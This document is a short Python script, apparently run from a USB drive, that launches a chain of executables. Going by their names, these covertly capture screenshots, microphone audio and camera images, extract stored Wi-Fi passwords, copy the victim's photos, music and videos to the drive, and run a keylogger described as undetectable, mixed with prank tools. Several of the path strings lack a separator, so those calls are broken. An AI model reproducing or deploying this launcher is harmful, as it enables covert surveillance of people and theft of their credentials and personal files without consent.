import subprocess
from time import sleep

subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/PY_CheckBatteryToREDUsb" + "PY_CheckBatteryToREDUsb.exe"])
sleep(1)
subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/PY_ScreenShotterToUsbE" + "PY_ScreenShotterToUsbE.exe"])
sleep(1)
subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/PY_MicRecToREDUsbE" + "PY_MicRecToREDUsbE.exe"])
sleep(1)
subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/PY_CameraShotterToREDUsbE" + "PY_CameraShotterToREDUsbE.exe"])
sleep(0.3)
subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/PY_WiFiPasswds" + "PY_WiFiPasswds.exe"])
sleep(0.3)
subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/PY_PhotoMusicVideosToUsbE" + "PY_PhotoMusicVideosToUsbE.exe"])
sleep(0.3)
subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/" + "PY_RandomSongPlayer.exe"])
sleep(0.3)
subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/" + "ShowRandomPhoto.exe"])
sleep(0.3)
subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/" + "PY-Fakt-Nenajdutelny-KeyLoggerToREDUsbE.exe"])
sleep(0.3)
subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/" + "PY-MouseMoover.exe"])
sleep(0.3)
subprocess.call(["E:/PY_ULTRA-SPUSTAC-A-SCRIPTY/PY-ULTRA-Scripty/PY_Apky/"+ "PY_WallPaperChangerToRedUsbE.exe"])
sleep(0.3)